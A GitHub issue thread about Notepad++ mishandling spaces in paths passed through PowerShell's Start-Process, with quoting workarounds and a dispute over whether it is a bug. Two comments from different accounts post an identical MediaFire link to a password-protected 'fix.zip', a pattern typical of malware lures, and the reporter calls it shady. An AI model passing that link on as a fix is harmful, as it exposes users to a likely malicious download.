### ISSUE TITLE
[BUG] Windows PowerShell 'start notepad++' command does not properly handle spaces in file paths

### ISSUE THREAD

**Issue by BOB74j** [notepad-plus-plus/notepad-plus-plus#15578]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description of the Issue

Running the _start notepad++_ command through Windows PowerShell (v7.4.4) to open a specific file does not properly handle spaces in file paths, as shown in the screenshot below. Notepad++ erroneously determines that the path ends at the first space, and the file cannot be opened via the PowerShell command line.

Curiously, testing indicates that the issue is not present in command prompt. The issue is also not present when simply running the built-in Windows _notepad_ command. 

### Steps To Reproduce

1.  Open Windows PowerShell into a Windows directory containing at least one space in the path
2.  Use the _dir_ command to confirm the presence of text files
3.  Attempt to open a text file in the target directory via Notepad++ by running the _start notepad++_ command in PowerShell, followed by the full path enclosed in quotation marks to handle the space

### Current Behavior

A Notepad++ dialog window appears offering to create a directory or file at a truncated version of the intended path. The truncation occurs at the first space in the file path.

### Expected Behavior

Notepad++ should properly handle spaces in the file path as it does when the _start notepad++_ is run through command prompt, or as the default Windows notepad program does.

### Debug Information

```shell
Notepad++ v8.6.9   (64-bit)
Build time : Jul 12 2024 - 05:09:25
Path : C:\Program Files\Notepad++\notepad++.exe
Command Line : C:\New folder\test.txt
Admin mode : OFF
Local Conf mode : OFF
Cloud Config : OFF
Periodic Backup : OFF
OS Name : Windows 11 Pro (64-bit)
OS Version : 23H2
OS Build : 22631.4037
Current ANSI codepage : 1252
Plugins : 
    ComparePlus (1.2)
    DSpellCheck (1.5)
    MarkdownViewerPlusPlus (0.8.2)
    mimeTools (3.1)
    NppConverter (4.6)
    NppExport (0.4)
```

### Anything else?

![Screenshot PowerShell](https://github.com/user-attachments/assets/b6ec831b-d836-4d21-b584-a9bb32d00f7a)

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BOB74j** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

That might be the shadiest random link I've seen on the Internet this week.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mpheath** [comment]
PowerShell `start` is alias for [Start-Process](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/start-process?view=powershell-7.4).

Common Partial Syntax:

```ps1
Start-Process
     [-FilePath] <string>
     [[-ArgumentList] <string[]>]
```

`ArgumentList` can be a string of arguments or an array of arguments. If a string of arguments then would expect double quotes to be escaped within the string if inserted within double quotes. An argument array to be a sequence of strings.
The OP image IMO would pass no argument double quotes to *Notepad++.exe* so the command line parsing sees `C:\New` as an argument.

Try

<details>

```ps1
start notepad++.exe "`"C:\New Folder\test.txt`""
```

or within single quotes

```ps1
start notepad++.exe '"C:\New Folder\test.txt"'
```

or as argument array

```ps1
start notepad++.exe @("C:\New Folder\test.txt")
```

Probably 2nd is easiest to enter and can see `+` colored so could quote the command

```ps1
start 'notepad++.exe' '"C:\New Folder\test.txt"'
```

</details>

*Notepad.exe* accepts 1 argument. *Notepad++.exe* accepts multiple arguments. The later will likely fail if not properly quoted. 

CMD `start` compared to PowerShell `Start-Process` might be similar in runtime behavior though the syntax required can be different.

I do not currently have Notepad++ installed so if someone can confirm the commands are working then that would be appreciated.

**Comment by alankilborn** [comment]
>if someone can confirm the commands are working 

* Tried with success: ```start notepad++.exe "`"C:\New Folder\test.txt`""```
* Tried with success: ```start notepad++.exe '"C:\New Folder\test.txt"'```
* Tried with failure: ```start notepad++.exe @("C:\New Folder\test.txt")```

Two out of three ain't bad; regardless, this can be shown to be not a problem with Notepad++, so this issue can be closed.

**Comment by bordenc** [comment]
> Two out of three ain't bad; regardless, this shows that it is not a problem with Notepad++, so this issue can be closed.

I disagree. Other process calls (like vanilla Windows notepad) can handle spaces in their -ArgumentList without all this extra escaping. Notepad++'s parsing behaviour is unexpected, so it is, therefore, a bug in Notepad++.
